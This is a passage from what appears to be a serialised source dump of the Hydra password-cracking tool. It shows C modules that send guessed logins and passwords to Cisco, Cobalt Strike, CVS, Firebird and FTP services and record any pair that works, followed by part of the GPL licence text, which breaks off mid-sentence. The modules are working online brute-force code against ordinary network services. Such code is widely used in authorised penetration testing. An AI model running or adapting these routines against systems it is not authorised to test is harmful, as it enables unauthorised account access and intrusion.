hydra_connect_ssl(ip, mysslport, hostname);\n port = mysslport;\n }\n if (sock < 0) {\n hydra_report(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n do {\n if (f != 0) {\n free(buf2);\n buf2 = NULL;\n } else\n f = 1;\n if ((buf2 = (unsigned char *)hydra_receive_line(sock)) == NULL) {\n if (failc < retry) {\n next_run = 1;\n failc++;\n if (quiet != 1)\n hydra_report(stderr,\n \"[ERROR] Child with pid %d was disconnected - \"\n \"retrying (%d of %d retries)\\n\",\n (int32_t)getpid(), failc, retry);\n sleep(3);\n break;\n } else {\n if (quiet != 1)\n hydra_report(stderr, \"[ERROR] Child with pid %d was disconnected - exiting\\n\", (int32_t)getpid());\n hydra_child_exit(0);\n }\n }\n if (buf2 != NULL && hydra_strcasestr((char *)buf2, \"ress ENTER\") != NULL)\n hydra_send(sock, \"\\r\\n\", 2, 0);\n } while (buf2 != NULL && strstr((char *)buf2, \"assw\") == NULL);\n free(buf2);\n if (next_run != 0)\n break;\n failc = 0;\n next_run = 2;\n break;\n }\n case 2: /* run the cracking function */\n next_run = start_cisco(sock, ip, port, options, miscptr, fp);\n break;\n case 3: /* clean exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(0);\n return;\n default:\n hydra_report(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(0);\n#ifdef PALM\n return;\n#else\n hydra_child_exit(2);\n#endif\n }\n run = next_run;\n }\n}\n\nint32_t service_cisco_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n return 0;\n}\n\nvoid usage_cisco(const char *service) {\n printf(\"Module cisco is optionally taking the keyword ENTER, it then sends \"\n \"an initial\\n\"\n \"ENTER when connecting to the service.\\n\");\n}\n" }, { "path": "hydra-cobaltstrike.c", "content": "#include \"hydra-mod.h\"\n\n#define CSLEN 256\n\nextern char *HYDRA_EXIT;\nchar *buf;\n\nint32_t start_cobaltstrike(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *empty = \"\";\n char *pass, buffer[4 + 1 + 256];\n char cs_pass[CSLEN + 1];\n unsigned char len_pass;\n unsigned char reply_byte_0;\n unsigned char reply_byte_1;\n unsigned char reply_byte_2;\n unsigned char reply_byte_3;\n int32_t ret = -1;\n\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n if (strlen(pass) > CSLEN)\n pass[CSLEN - 1] = 0;\n len_pass = strlen(pass);\n memset(cs_pass, 0, CSLEN + 1);\n strcpy(cs_pass, pass);\n\n memset(buffer, 0x41, sizeof(buffer));\n buffer[0] = 0x00;\n buffer[1] = 0x00;\n buffer[2] = 0xBE;\n buffer[3] = 0xEF;\n memcpy(buffer + 4, &len_pass, 1);\n memcpy(buffer + 5, cs_pass, len_pass);\n\n if (hydra_send(s, buffer, sizeof(buffer), 0) < 0)\n return 1;\n\n reply_byte_0 = 0x00;\n ret = hydra_recv_nb(s, &reply_byte_0, 1);\n if (ret <= 0)\n return 3;\n\n reply_byte_1 = 0x00;\n ret = hydra_recv_nb(s, &reply_byte_1, 1);\n if (ret <= 0)\n return 3;\n\n reply_byte_2 = 0x00;\n ret = hydra_recv_nb(s, &reply_byte_2, 1);\n if (ret <= 0)\n return 3;\n\n reply_byte_3 = 0x00;\n ret = hydra_recv_nb(s, &reply_byte_3, 1);\n if (ret <= 0)\n return 3;\n\n if (reply_byte_0 == 0x00 && reply_byte_1 == 0x00 && reply_byte_2 == 0xCA && reply_byte_3 == 0xFE) {\n hydra_report_found_host(port, ip, \"cobaltstrike\", fp);\n hydra_completed_pair_found();\n free(buf);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 2;\n return 1;\n }\n\n free(buf);\n hydra_completed_pair();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 2;\n\n return 1;\n}\n\nvoid service_cobaltstrike(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1;\n int32_t mysslport = PORT_COBALTSTRIKE_SSL;\n\n hydra_register_socket(sp);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n while (1) {\n switch (run) {\n case 1: /* connect and service init function */\n if (port != 0)\n mysslport = port;\n sock = hydra_connect_ssl(ip, mysslport, hostname);\n port = mysslport;\n if (sock < 0) {\n hydra_report(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n next_run = start_cobaltstrike(sock, ip, port, options, miscptr, fp);\n hydra_disconnect(sock);\n break;\n case 2: /* clean exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(0);\n return;\n case 3: /* clean exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(2);\n return;\n default:\n hydra_report(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(2);\n }\n run = next_run;\n }\n}\n\nint32_t service_cobaltstrike_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n return 0;\n}\n" }, { "path": "hydra-cvs.c", "content": "#include \"hydra-mod.h\"\n\nextern int32_t hydra_data_ready_timed(int32_t socket, long sec, long usec);\n\nextern char *HYDRA_EXIT;\nchar *buf;\n\nint32_t start_cvs(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *empty = \"\";\n char *login, *pass, buffer[1024], pass2[513];\n int32_t i;\n char *directory = miscptr;\n\n /* evil cvs encryption sheme...\n 0 111 P 125 p 58\n ! 120 1 52 A 57 Q 55 a 121 q 113\n \" 53 2 75 B 83 R 54 b 117 r 32\n 3 119 C 43 S 66 c 104 s 90\n 4 49 D 46 T 124 d 101 t 44\n % 109 5 34 E 102 U 126 e 100 u 98\n & 72 6 82 F 40 V 59 f 69 v 60\n ' 108 7 81 G 89 W 47 g 73 w 51\n ( 70 8 95 H 38 X 92 h 99 x 33\n ) 64 9 65 I 103 Y 71 i 63 y 97\n * 76 : 112 J 45 Z 115 j 94 z 62\n + 67 ; 86 K 50 k 93\n , 116 < 118 L 42 l 39\n - 74 = 110 M 123 m 37\n . 68 > 122 N 91 n 61\n / 87 ? 105 O 35 _ 56 o 48\n */\n\n char key[] = {0, 120, 53, 0, 0, 109, 72, 108, 70, 64, 76, 67, 116, 74, 68, 87, 111, 52, 75, 119, 49, 34, 82, 81, 95, 65, 112, 86, 118, 110, 122, 105, 0, 57, 83, 43, 46, 102, 40, 89, 38, 103, 45, 50, 42, 123, 91, 35, 125, 55, 54, 66, 124, 126, 59, 47, 92, 71, 115, 0, 0, 0, 0, 56, 0, 121, 117, 104, 101, 100, 69, 73, 99, 63, 94, 93, 39, 37, 61, 48, 58, 113, 32, 90, 44, 98, 60, 51, 33, 97, 62};\n\n if (strlen(login = hydra_get_next_login()) == 0)\n login = empty;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n memset(pass2, 0, sizeof(pass2));\n strncpy(pass2, pass, 512);\n\n for (i = 0; i < strlen(pass); i++) {\n pass2[i] = key[pass2[i] - 0x20];\n }\n\n snprintf(buffer, sizeof(buffer), \"BEGIN VERIFICATION REQUEST\\n%s\\n%s\\nA%s\\nEND VERIFICATION REQUEST\\n\", directory, login, pass2);\n\n i = 57 + strlen(directory) + strlen(login) + strlen(pass2);\n\n if (hydra_send(s, buffer, i - 1, 0) < 0) {\n return 1;\n }\n\n if (hydra_data_ready_timed(s, 5, 0) > 0) {\n buf = hydra_receive_line(s);\n if (strstr(buf, \"I LOVE YOU\\n\")) {\n hydra_report_found_host(port, ip, \"cvs\", fp);\n hydra_completed_pair_found();\n free(buf);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) {\n return 3;\n }\n } else if (strstr(buf, \"no such user\") || strstr(buf, \"E PAM start error: Critical error - immediate abort\\n\")) {\n if (verbose) {\n hydra_report(stderr, \"[INFO] User %s does not exist, skipping\\n\", login);\n }\n hydra_completed_pair_skip();\n free(buf);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) {\n return 3;\n }\n }\n /* \"I HATE YOU\\n\" case */\n free(buf);\n return 3;\n }\n\n return 3;\n}\n\nvoid service_cvs(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1;\n int32_t myport = PORT_CVS, mysslport = PORT_CVS_SSL;\n\n hydra_register_socket(sp);\n\n if ((miscptr == NULL) || (strlen(miscptr) == 0)) {\n miscptr = \"/root\";\n }\n\n while (1) {\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n\n switch (run) {\n case 1: /* connect and service init function */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n\n // usleepn(300);\n if ((options & OPTION_SSL) == 0) {\n if (port != 0)\n myport = port;\n sock = hydra_connect_tcp(ip, myport);\n port = myport;\n } else {\n if (port != 0)\n mysslport = port;\n sock = hydra_connect_ssl(ip, mysslport, hostname);\n port = mysslport;\n }\n\n if (sock < 0) {\n hydra_report(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n next_run = start_cvs(sock, ip, port, options, miscptr, fp);\n break;\n case 3: /* clean exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(2);\n return;\n default:\n hydra_report(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(2);\n }\n run = next_run;\n }\n}\n\nint32_t service_cvs_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n return 0;\n}\n\nvoid usage_cvs(const char *service) {\n printf(\"Module cvs is optionally taking the repository name to attack, \"\n \"default is \\\"/root\\\"\\n\\n\");\n}\n" }, { "path": "hydra-firebird.c", "content": "/*\n\nFirebird Support - by David Maciejak @ GMAIL dot com\n\nyou need to pass full path to the fdb file as argument\ndefault account is SYSDBA/masterkey\n\non Firebird 2.0, access to the database file directly\nis not possible anymore, in verbose mode you will see\nthe msg: \"no permission for direct access to security database\"\n\n */\n\n#include \"hydra-mod.h\"\n\n#ifndef LIBFIREBIRD\nvoid dummy_firebird() { printf(\"\\n\"); }\n#else\n\n#include \n#include \n\n#define DEFAULT_DB \"C:\\\\Program Files\\\\Firebird\\\\Firebird_1_5\\\\security.fdb\"\n\nextern hydra_option hydra_options;\nextern char *HYDRA_EXIT;\n\nint32_t start_firebird(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *empty = \"\";\n char *login, *pass;\n char database[256];\n char connection_string[1024];\n\n isc_db_handle db; /* database handle */\n ISC_STATUS_ARRAY status; /* status vector */\n\n char *dpb = NULL; /* DB parameter buffer */\n short dpb_length = 0;\n\n if (miscptr)\n strncpy(database, miscptr, sizeof(database));\n else\n strncpy(database, DEFAULT_DB, sizeof(database));\n database[sizeof(database) - 1] = 0;\n\n if (strlen(login = hydra_get_next_login()) == 0)\n login = empty;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n dpb_length = (short)(1 + strlen(login) + 2 + strlen(pass) + 2);\n if ((dpb = (char *)malloc(dpb_length)) == NULL) {\n hydra_report(stderr, \"[ERROR] Can't allocate memory\\n\");\n return 1;\n }\n\n /* Add user and password to dpb */\n *dpb = isc_dpb_version1;\n dpb_length = 1;\n isc_modify_dpb(&dpb, &dpb_length, isc_dpb_user_name, login, strlen(login));\n isc_modify_dpb(&dpb, &dpb_length, isc_dpb_password, pass, strlen(pass));\n\n /* Create connection string */\n snprintf(connection_string, sizeof(connection_string), \"%s:%s\", hydra_address2string(ip), database);\n\n if (isc_attach_database(status, 0, connection_string, &db, dpb_length, dpb)) {\n /* for debugging perpose */\n if (verbose) {\n hydra_report(stderr, \"[VERBOSE] \");\n isc_print_status(status);\n }\n isc_free(dpb);\n hydra_completed_pair();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 2;\n } else {\n isc_detach_database(status, &db);\n isc_free(dpb);\n hydra_report_found_host(port, ip, \"firebird\", fp);\n hydra_completed_pair_found();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 2;\n }\n return 1;\n}\n\nvoid service_firebird(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1;\n int32_t myport = PORT_FIREBIRD, mysslport = PORT_FIREBIRD_SSL;\n\n hydra_register_socket(sp);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n\n while (1) {\n switch (run) {\n case 1: /* connect and service init function */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n if ((options & OPTION_SSL) == 0) {\n if (port != 0)\n myport = port;\n sock = hydra_connect_tcp(ip, myport);\n port = myport;\n } else {\n if (port != 0)\n mysslport = port;\n sock = hydra_connect_ssl(ip, mysslport, hostname);\n port = mysslport;\n }\n if (sock < 0) {\n if (quiet != 1)\n fprintf(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n\n next_run = 2;\n break;\n\n case 2:\n\n /*\n * Here we start the password cracking process\n */\n\n next_run = start_firebird(sock, ip, port, options, miscptr, fp);\n if ((next_run == 1 || next_run == 2) && hydra_options.conwait)\n sleep(hydra_options.conwait);\n break;\n case 3:\n\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(0);\n return;\n\n default:\n\n fprintf(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(0);\n }\n run = next_run;\n }\n}\n\n#endif\n\nint32_t service_firebird_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n return 0;\n}\n\nvoid usage_firebird(const char *service) {\n printf(\"Module firebird is optionally taking the database path to attack,\\n\"\n \"default is \\\"C:\\\\Program \"\n \"Files\\\\Firebird\\\\Firebird_1_5\\\\security.fdb\\\"\\n\\n\");\n}\n" }, { "path": "hydra-ftp.c", "content": "#include \"hydra-mod.h\"\n\nextern char *HYDRA_EXIT;\nchar *buf;\n\nint32_t start_ftp(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *empty = \"\\\"\\\"\";\n char *login, *pass, buffer[510];\n\n if (strlen(login = hydra_get_next_login()) == 0)\n login = empty;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n sprintf(buffer, \"USER %.250s\\r\\n\", login);\n\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n buf = hydra_receive_line(s);\n if (buf == NULL)\n return 1;\n /* special hack to identify 530 user unknown msg. suggested by\n * Jean-Baptiste.BEAUFRETON@turbomeca.fr */\n if (buf[0] == '5' && buf[1] == '3' && buf[2] == '0') {\n if (verbose)\n printf(\"[INFO] user %s does not exist, skipping\\n\", login);\n hydra_completed_pair_skip();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) {\n free(buf);\n return 4;\n }\n free(buf);\n return 1;\n }\n // for servers supporting anon access without password\n if (buf[0] == '2') {\n hydra_report_found_host(port, ip, \"ftp\", fp);\n hydra_completed_pair_found();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) {\n free(buf);\n return 4;\n }\n free(buf);\n return 1;\n }\n if (buf[0] != '3') {\n if (buf) {\n if (verbose || debug)\n hydra_report(stderr, \"[ERROR] Not an FTP protocol or service shutdown: %s\\n\", buf);\n free(buf);\n }\n return 3;\n }\n free(buf);\n\n sprintf(buffer, \"PASS %.250s\\r\\n\", pass);\n\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n buf = hydra_receive_line(s);\n if (buf == NULL)\n return 1;\n if (buf[0] == '2') {\n hydra_report_found_host(port, ip, \"ftp\", fp);\n hydra_completed_pair_found();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) {\n free(buf);\n return 4;\n }\n free(buf);\n return 1;\n }\n\n free(buf);\n hydra_completed_pair();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 4;\n\n return 2;\n}\n\nvoid service_ftp_core(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname, int32_t tls) {\n int32_t run = 1, next_run = 1, sock = -1;\n int32_t myport = PORT_FTP, mysslport = PORT_FTP_SSL;\n\n hydra_register_socket(sp);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n hydra_child_exit(0);\n while (1) {\n switch (run) {\n case 1: /* connect and service init function */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n // usleepn(300);\n if ((options & OPTION_SSL) == 0) {\n if (port != 0)\n myport = port;\n sock = hydra_connect_tcp(ip, myport);\n port = myport;\n } else {\n if (port != 0)\n mysslport = port;\n sock = hydra_connect_ssl(ip, mysslport, hostname);\n port = mysslport;\n }\n if (sock < 0) {\n if (verbose || debug)\n hydra_report(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n usleepn(250);\n buf = hydra_receive_line(sock);\n if (buf == NULL || buf[0] != '2') { /* check the first line */\n if (verbose || debug)\n hydra_report(stderr, \"[ERROR] Not an FTP protocol or service shutdown: %s\\n\", buf);\n hydra_child_exit(2);\n if (buf != NULL)\n free(buf);\n hydra_child_exit(2);\n }\n\n while (buf != NULL && strncmp(buf, \"220 \", 4) != 0 && strstr(buf, \"\\n220 \") == NULL) {\n free(buf);\n buf = hydra_receive_line(sock);\n }\n free(buf);\n\n // this mode is manually chosen, so if it fails we giving up\n if (tls) {\n if (hydra_send(sock, \"AUTH TLS\\r\\n\", strlen(\"AUTH TLS\\r\\n\"), 0) < 0) {\n hydra_child_exit(2);\n }\n buf = hydra_receive_line(sock);\n if (buf == NULL) {\n if (verbose || debug)\n hydra_report(stderr, \"[ERROR] Not an FTP protocol or service shutdown: %s\\n\", buf);\n hydra_child_exit(2);\n }\n if (buf[0] == '2') {\n if ((hydra_connect_to_ssl(sock, hostname) == -1) && verbose) {\n hydra_report(stderr, \"[ERROR] Can't use TLS\\n\");\n hydra_child_exit(2);\n } else {\n if (verbose)\n hydra_report(stderr, \"[VERBOSE] TLS connection done\\n\");\n }\n } else {\n hydra_report(stderr, \"[ERROR] TLS negotiation failed %s\\n\", buf);\n hydra_child_exit(2);\n }\n free(buf);\n }\n\n next_run = 2;\n break;\n case 2: /* run the cracking function */\n next_run = start_ftp(sock, ip, port, options, miscptr, fp);\n break;\n case 3: /* error exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(2);\n break;\n case 4: /* clean exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(0);\n break;\n default:\n hydra_report(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(2);\n }\n run = next_run;\n }\n}\n\nvoid service_ftp(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) { service_ftp_core(ip, sp, options, miscptr, fp, port, hostname, 0); }\n\nvoid service_ftps(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) { service_ftp_core(ip, sp, options, miscptr, fp, port, hostname, 1); }\n\nint32_t service_ftp_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n return 0;\n}\n" }, { "path": "hydra-gtk/AUTHORS", "content": "" }, { "path": "hydra-gtk/COPYING", "content": "\t\t GNU GENERAL PUBLIC LICENSE\n\t\t Version 2, June 1991\n\n Copyright (C) 1989, 1991 Free Software Foundation, Inc.\n 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n Everyone is permitted to copy and distribute verbatim copies\n of this license document, but changing it is not allowed.\n\n\t\t\t Preamble\n\n The licenses for most software are designed to take away your\nfreedom to share and change it. By contrast, the GNU General Public\nLicense is intended to guarantee your freedom to share and change free\nsoftware--to make sure the software is free for all its users. This\nGeneral Public License applies to most of the Free Software\nFoundation's software and to any other program whose authors commit to\nusing it. (Some other Free Software Foundation software is covered by\nthe GNU Library General Public License instead.) You can apply it to\nyour programs, too.\n\n When we speak of free software, we are referring to freedom, not\nprice. Our General Public Licenses are designed to make sure that you\nhave the freedom to distribute copies of free software (and charge for\nthis service if you wish), that you receive source code or can get it\nif you want it, that you can change the software or use pieces of it\nin new free programs; and that you know you can do these things.\n\n To protect your rights, we need to make restrictions that forbid\nanyone to deny you these rights or to ask you to surrender the rights.\nThese restrictions translate to certain responsibilities for you if you\ndistribute copies of the software, or if you modify it.\n\n For example, if you distribute copies of such a program, whether\ngratis or for a fee, you must give the recipients all the rights that\nyou have. You must make sure that they, too, receive or can get the\nsource code. And you must show them these terms so they know their\nrights.\n\n We protect your rights with two steps: (1) copyright the software, and\n(2) offer you this license which gives you legal permission to copy,\ndistribute and/or modify the software.\n\n Also, for each author's protection and ours, we want to make certain\nthat everyone understands that there is no warranty for this free\nsoftware. If the software is modified by someone else and passed on, we\nwant its recipients to know that what they have is not the original, so\nthat any problems introduced by others will not reflect on the original\nauthors' reputations.\n\n Finally, any free program is threatened constantly by software\npatents. We wish to avoid the danger that redistributors of a free\nprogram will individually obtain patent licenses, in effect making the\nprogram proprietary. To prevent this, we have made it clear that any\npatent must be licensed for everyone's free use or not licensed at all.\n\n The precise terms and conditions for copying, distribution and\nmodification follow.\n\f\n\t\t GNU GENERAL PUBLIC LICENSE\n TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION\n\n 0. This License applies to any program or other work which contains\na notice placed by the copyright holder saying it may be distributed\nunder the terms of this General Public License. The \"Program\", below,\nrefers to any such program or work, and a \"work based on the Program\"\nmeans either the Program or any derivative work under copyright law:\nthat is to say, a work containing the Program or a portion of it,\neither verbatim or with modifications and/or translated into another\nlanguage. (Hereinafter, translation is included without limitation in\nthe term \"modification\".) Each licensee is addressed as \"you\".\n\nActivities other than copying, distribution and modification are not\ncovered by this License; they are outside its scope. The act of\nrunning the Program is not restricted, and the output from the Program\nis covered only if its contents constitute a work based on the\nProgram (independent of having been made by running the Program).\nWhether that is true depends on what the Program does.\n\n 1. You may copy and distribute verbatim copies of the Program's\nsource code as you receive it, in any medium, provided that you\nconspicuously and appropriately publish on each copy an appropriate\ncopyright notice and disclaimer of warranty; keep intact all the\nnotices that refer to this License and to the absence of any warranty;\nand give any other recipients of the Program a copy of this License\nalong with the Program.\n\nYou may charge a fee for the physical act of transferring a copy, and\nyou may at your option offer warranty protection in exchange for a fee.\n\n 2. You may modify your copy or copies of the Program or any portion\nof it, thus forming a work based on the Program, and copy and\ndistribute such modifications or work under the terms of Section 1\nabove, provided that you also meet all of these conditions:\n\n a) You must cause the modified files to carry prominent notices\n stating that you changed the files and the date of any change.\n\n b) You must cause any work that you distribute or publish, that in\n whole or in part contains or is derived from the Program or any\n part thereof, to be licensed as a whole at no charge to all third\n parties under the terms of this License.\n\n c) If the modified program normally reads commands interactively\n when run, you must cause it, when started running for such\n interactive use in the most ordinary way, to print or display an\n announcement including an appropriate copyright notice and a\n notice that there is no warranty (or else, saying that you provide\n a warranty) and that users may redistribute the program under\n these conditions, and telling the user how to view a copy of this\n License. (Exception: if the Program itself is interactive but\n does not normally print such an announcement, your work based on\n the Program is not required to print an announcement.)\n\f\nThese requirements apply to the modified work as a whole. If\nidentifiable sections of that work are not derived from the Program,\nand can be reasonably considered independent and separate works in\nthemselves, then this License, and its terms, do not apply to those\nsections when you distribute them as separate works. But when you\ndistribute the same sections as part of a whole which is a work based\non the Program, the distribution of the whole must be on the terms of\nthis License, whose permissions for other licensees extend to the\nentire whole, and thus to each and every part regardless of who wrote it.\n\nThus, it is not the intent of this section to claim rights or contest\nyour rights to work written entirely by you; rather, the intent is to\nexercise the right to control the distribution of derivative or\ncollective works based on the Program.\n\nIn addition, mere aggregation of another work not based on the Program\nwith the Program (or with a work based on the Program) on a volume of\na storage or distribution medium does not bring the other work under\nthe scope of this License.\n\n 3. You may copy and distribute the Program (or a work based on it,\nunder Section 2) in object code or executable form under the terms of\nSections 1 and 2 above provided that you also do one of the following:\n\n a) Accompany it with the complete corresponding machine-readable\n source code, which must be distributed under the terms of Sections\n 1 and 2 above on a medium customarily used for software interchange; or,\n\n b) Accompany it with a written offer, valid for at least three\n years, to give any third party, for a charge no more than your\n cost of physically performing source distribution, a complete\n machine-readable copy of the corresponding source code, to be\n distributed under the terms of Sections 1 and 2 above on a medium\n customarily used for software interchange; or,\n\n c) Accompany it with the information you received as to the offer\n to distribute corresponding source code. (This alternative is\n allowed only for noncommercial distribution and only if you\n received the program in object code or executable form with such\n an offer, in accord with Subsection b above.)\n\nThe source code for a work means the preferred form of the work for\nmaking modifications to it. For an executable work, complete source\ncode means all the source code for all modules it contains, plus any\nassociated interface definition files, plus the scripts used to\ncontrol compilation and installation of the executable. However, as a\nspecial exception, the source code distributed need not include\nanything that is normally distributed (in either source or binary\nform) with the major components (compiler, kernel, and so on) of the\noperating system on which the executable runs, unless that component\nitself accompanies the executable.\n\nIf distribution of executable or object code is made by offering\naccess to copy from a designated place, then offering equivalent\naccess to copy the source code from the same place counts as\ndistribution of the source code, even though third parties are not\ncompelled to copy the source along with the object code.\n\f\n 4. You may not copy, modify, sublicense, or distribute the Program\nexcept as expressly provided under this License. Any attempt\notherwise to copy, modify, sublicense or distribute the Program is\nvoid, and will automatically terminate your rights under this License.\nHowever, parties who have received copies, or rights, from you under\nthis License will not have their licenses terminated so long as such\nparties remain in full compliance.\n\n 5. You are not required to accept this License, since you have not\nsigned it. However, nothing else grants you permission to modify or\ndistribute the Program or its derivative works. These actions are\nprohibited by law if you do not accept this License. Therefore, by\nmodifying or distributing the Program (or any work based on the\nProgram), you indicate your acceptance of this License to do so, and\nall its terms and conditions for copying, distributing or modifying\nthe Program or works based on it.\n\n 6. Each time you redistribute the Program (or any work based on the\nProgram), the recipient automatically receives a license from the\noriginal licensor to copy, distribute or modify the Program subject to\nthese terms and conditions. You may not impose any further\nrestrictions on the recipients' exercise of the rights granted herein.\nYou are not responsible for enforcing compliance by third parties to\nthis License.\n\n 7. If, as a consequence of a court judgment or allegation of patent\ninfringement or for any other reason (not limited to patent issues),\nconditions are imposed on you (whether by court order, agreement or\notherwise) that contradict the conditions of this License, they do not\nexcuse you from the conditions of this License. If you cannot\ndistribute so as to satisfy simultaneously your obligations under this\nLicense and any other pertinent obligations, then as a consequence you\nmay not distribute the Program at all. For example, if a patent\nlicense would not permit royalty-free redistribution of the Program by\nall those who receive copies directly or indirectly through you, then\nthe only way you could satisfy both it and this License would be to\nrefrain entirely from distribution of the Program.\n\nIf any portion of this section is held invalid or unenforceable under\nany particular circumstance, the balance of the section is intended to\napply and the section as a whole is intended to apply in other\ncircumstances.\n\nIt is not the purpose of this section to induce you to infringe any\npatents or other property right claims or to contest validity of any\nsuch claims; this section has the sole purpose of protecting the\nintegrity of the free software distribution system, which is\nimplemented by public license practices. Many people have made\ngenerous contributions to the wide range of software distributed\nthrough that system in reliance on consistent application of that\nsystem; it is up to the author/donor to decide if he or she is willing\nto distribute software through any other system and a licensee cannot\nimpose that choice.\n\nThis section is intended to make thoroughly clear what is believed to\nbe a consequence of the rest of this License.\n\f\n 8. If the distribution and/or use of the Program is restricted in\ncertain countries either by patents or by copyrighted interfaces, the\noriginal copyright holder who places the Program under this License\nmay add an explicit geographical distribution limitation excluding\nthose countries, so that distribution is permitted only in or among\ncountries not thus excluded. In such case, this License incorporates\nthe limitation as if written in the body of this License.\n\n 9. The Free Software Foundation may publish revised and/or new versions\nof the General Public License from time to time. Such new versions will\nbe similar in spirit to the present version, but may differ in detail to\naddress new problems or concerns.\n\nEach version is given a distinguishing version number. If the Program\nspecifies a version number of this License which applies to it and \"any\nlater version\", you have the option of following the terms and conditions\neither of that version or of any later version published by the Free\nSoftware Foundation. If the Program does not specify a version number of\nthis License, you may 